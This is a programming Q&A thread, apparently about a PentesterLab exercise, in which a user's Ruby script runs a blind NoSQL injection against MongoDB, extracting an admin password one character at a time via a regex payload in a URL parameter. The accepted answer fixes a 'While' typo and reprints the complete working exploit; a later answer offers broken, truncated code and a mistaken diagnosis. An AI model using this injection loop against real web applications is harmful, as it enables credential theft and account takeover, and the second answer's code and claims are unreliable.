# unexpected keyword_end MongoDB Injection

Tags: ruby, mongodb, code-injection

im doing one of the tasks to retrieve more information from the NoSQL database using ruby .everytime i run the code im getting syntax error

```
    require 'httparty'
    URL="ptl-eb7cd0e0-778a277a.libcurl.so"
    def check?(str)
    resp = HTTParty.get("http://#{URL}/? 
    search=admin%27%20%26%26%20this.password.match(/#{str}/)%00")

    return resp.body =~ />admin</
    end


    #puts check?("d").inspect
    #puts check?("aaa").inspect

    CHARSET = ('a'..'z').to_a+('0'..'9').to_a+['-']
    password = ""

    While true
    CHARSET.each do |c|
    puts "Trying: #{c} for #{password}"
    test = password+c
    if check?("^#{test}.*$") 
    password+=c
    puts password
    break
    end
    end
    end
```

Answer (score 3):

There is a typo `while` is a keyword and need to be written in downcase.

```
require 'httparty'

URL = "ptl-eb7cd0e0-778a277a.libcurl.so"

def check?(str)
  resp = HTTParty.get(
    "http://#{URL}/?search=admin%27%20%26%26%20this.password.match(/#{str}/)%00"
  )

  return resp.body =~ />admin</
end


# puts check?("d").inspect
# puts check?("aaa").inspect

CHARSET = ('a'..'z').to_a + ('0'..'9').to_a + ['-']
password = ""

while true                      # `while` needs to be downcase
  CHARSET.each do |c|
    puts "Trying: #{c} for #{password}"
    test = password + c
    if check?("^#{test}.*$") 
      password += c
      puts password
      break
    end
  end
end
```

Btw. proper indention and some white improves readability a lot.

Comment: Also, if you don't actually have a condition and just want to loop forever, you can use `loop do` instead of `while true`. It's a little more readable (and I imagine faster, because there's no condition to check every iteration, though I can't confirm that).

Answer (score 0):

Its an issue with httparty gem.
First, install the same. also I made some changes in code.
The code is running but still not getting the result.

I have made below changes :

require 'httparty'

## URL=(URI.encode 'myurl')

def check?(str)
  resp = HTTParty.get(URI.encode "http://myurl/?search=admin%27%20%26%26%20this.password.match(#/{str}/)%00")
  return resp.body =~ />admin

puts check?("5").inspect
puts check?("aaa").inspect

It is recommended to use URI.encode function.
I still trying to get the desired output. 
I hope I will get the result.

You can modify the script or let me know if you had success in running the script.